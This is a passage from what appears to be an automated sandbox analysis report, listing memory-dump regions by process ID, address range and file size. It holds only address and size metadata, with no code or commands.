                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.6MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2196-501-0x00000000055B0000-0x00000000055B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2228-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2288-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2288-361-0x0000000003130000-0x0000000003132000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2332-188-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2396-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2464-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2464-354-0x0000000002720000-0x0000000002722000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2524-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2560-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2580-275-0x00000000001C0000-0x00000000001C9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2580-276-0x0000000000400000-0x0000000000437000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              220KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2580-273-0x0000000000030000-0x0000000000038000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              32KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2580-372-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2580-190-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2604-536-0x0000000006ED0000-0x0000000007006000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2604-327-0x0000000000DA0000-0x0000000000DB6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              88KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2604-541-0x0000000002CF0000-0x0000000002DEA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1000KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2664-359-0x00000000058A0000-0x00000000058A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2664-331-0x00000000773C0000-0x000000007754E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.6MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2664-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2780-298-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2792-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-229-0x00000000052C2000-0x00000000052C3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-508-0x00000000052C3000-0x00000000052C4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-203-0x0000000003500000-0x0000000003501000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-421-0x000000007EE80000-0x000000007EE81000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-197-0x0000000003500000-0x0000000003501000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-220-0x00000000052C0000-0x00000000052C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-255-0x00000000087A0000-0x00000000087A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-245-0x00000000081F0000-0x00000000081F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-247-0x0000000008220000-0x0000000008221000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-249-0x0000000008290000-0x0000000008291000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-251-0x0000000008300000-0x0000000008301000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-213-0x0000000006660000-0x0000000006661000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-260-0x00000000074F0000-0x00000000074F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-253-0x0000000006C30000-0x0000000006C31000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-198-0x0000000002B50000-0x0000000002B51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-264-0x0000000008050000-0x0000000008051000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-204-0x0000000002B50000-0x0000000002B51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-218-0x0000000006CE0000-0x0000000006CE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-222-0x00000000066A0000-0x00000000066A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-240-0x0000000007410000-0x0000000007411000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-227-0x00000000066A2000-0x00000000066A3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-414-0x000000007F0E0000-0x000000007F0E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2892-496-0x00000000066A3000-0x00000000066A4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2900-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3048-257-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              128KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3048-270-0x00000000054E0000-0x00000000054E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3048-266-0x0000000005A50000-0x0000000005A51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3048-258-0x0000000000418D3E-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3048-274-0x0000000005630000-0x0000000005631000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3048-291-0x0000000005560000-0x0000000005561000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3048-296-0x0000000005440000-0x0000000005A46000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              6.0MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3252-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3288-318-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3324-285-0x0000000000160000-0x0000000000161000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3324-281-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3344-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3572-210-0x00000000000C0000-0x00000000000C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3572-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3572-225-0x000000001AEB0000-0x000000001AEB2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3732-334-0x00000000056E0000-0x000000000582A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.3MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3732-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3752-176-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3872-379-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3872-394-0x0000000000B70000-0x0000000000B72000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3884-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3928-286-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3928-292-0x00000000002A0000-0x00000000002A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3928-297-0x0000000000AE0000-0x0000000000AE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3928-323-0x0000000004BF0000-0x0000000004BF1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3988-406-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3992-224-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/3992-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4148-277-0x00000000028B0000-0x00000000028B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4148-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4148-221-0x0000000000DE0000-0x0000000000DE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4148-211-0x00000000008E0000-0x00000000008E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4148-226-0x000000001B610000-0x000000001B612000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4296-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4296-268-0x00000000001C0000-0x00000000001E9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              164KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4296-269-0x0000000000460000-0x00000000005AA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.3MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4296-271-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              352KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4312-178-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4388-200-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4388-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4404-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4404-366-0x0000000005FB0000-0x00000000060FA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.3MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4488-400-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4516-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4516-408-0x00000000048B0000-0x00000000048B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4536-329-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4536-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4596-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4620-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4624-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4628-445-0x0000000004973000-0x0000000004974000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4628-459-0x0000000004974000-0x0000000004976000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4628-441-0x0000000004972000-0x0000000004973000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4628-437-0x0000000004970000-0x0000000004971000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4632-209-0x0000000000110000-0x0000000000111000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4632-223-0x0000000004970000-0x0000000004971000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4632-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4632-233-0x0000000002490000-0x0000000002506000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              472KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4632-235-0x00000000024B0000-0x00000000024B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4632-244-0x0000000004F90000-0x0000000004F91000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4656-278-0x0000000000590000-0x00000000006DA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.3MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4656-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4656-272-0x0000000000781000-0x00000000007AC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              172KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4656-279-0x0000000000400000-0x000000000058E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.6MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4732-302-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4776-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4800-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4936-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4976-287-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4992-375-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5000-314-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5000-337-0x0000000000350000-0x0000000000360000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              64KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/5000-343-0x0000000000750000-0x0000000000762000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              72KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/5040-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5212-474-0x0000000000D30000-0x0000000000D41000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              68KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/5212-520-0x0000000000DA0000-0x0000000000DB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              68KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/5212-472-0x0000000001100000-0x00000000011AE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              696KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/5324-505-0x0000000005790000-0x0000000005791000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/5324-467-0x00000000773C0000-0x000000007754E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.6MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/5372-498-0x0000000001A30000-0x0000000001A31000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/5640-465-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              12KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/6004-503-0x0000020199C20000-0x0000020199E40000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              2.1MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/6004-551-0x00000201B4626000-0x00000201B4627000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/6004-546-0x00000201B4623000-0x00000201B4625000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/6004-531-0x00000201B4620000-0x00000201B4622000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/6092-525-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB